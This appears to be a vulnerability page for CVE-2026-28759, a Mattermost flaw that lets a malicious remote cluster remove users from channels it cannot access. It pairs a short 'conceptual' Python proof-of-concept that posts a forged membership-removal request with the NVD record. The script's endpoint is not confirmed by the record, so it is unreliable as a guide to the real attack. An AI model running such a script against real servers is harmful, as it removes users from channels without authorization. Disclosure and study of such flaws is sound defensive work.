CVE-2026-28759

import requests # Conceptual PoC for CVE-2026-28759 # Demonstrates the logic of sending a malicious sync request. TARGET_URL = "https://target-mattermost.com/api/v4" TARGET_CHANNEL_ID = "private_channel_id_here" VICTIM_USER_ID = "user_id_to_remove" # Payload structure simulating a shared channel sync message payload = { "action": "remove_member", "channel_id": TARGET_CHANNEL_ID, "user_id": VICTIM_USER_ID, "sender_cluster_id": "malicious_cluster_id" } # Headers simulating cluster authentication headers = { "Content-Type": "application/json", "Authorization": "Bearer MALICIOUS_CLUSTER_TOKEN" } try: # Endpoint responsible for processing cluster sync messages response = requests.post(f"{TARGET_URL}/clusters/sync", json=payload, headers=headers) if response.status_code == 200: print("[+] Success: User removal request processed.") else: print(f"[-] Failed: Server returned {response.status_code}") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-28759", "sourceIdentifier": "[email protected]", "published": "2026-05-18T08:16:13.573", "lastModified": "2026-05-18T19:17:19.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate that a remote cluster has access to a channel before processing membership removal requests during shared channel membership sync, which allows a malicious remote cluster to remove any user from any channel, including private channels, via crafted membership sync messages targeting channels the remote cluster is not authorized to access. Mattermost Advisory ID: MMSA-2026-00576"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.14", "matchCriteriaId": "413D9405-79C3-4299-B0DC-40D9EE5CC717"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.4.4", "matchCriteriaId": "CF171039-837A-4D23-87EB-F328AD04976C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.5.0", "versionEndExcluding": "11.5.2", "matchCriteriaId": "726AD6AD-6C01-45BB-9115-B8209717A6D4"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}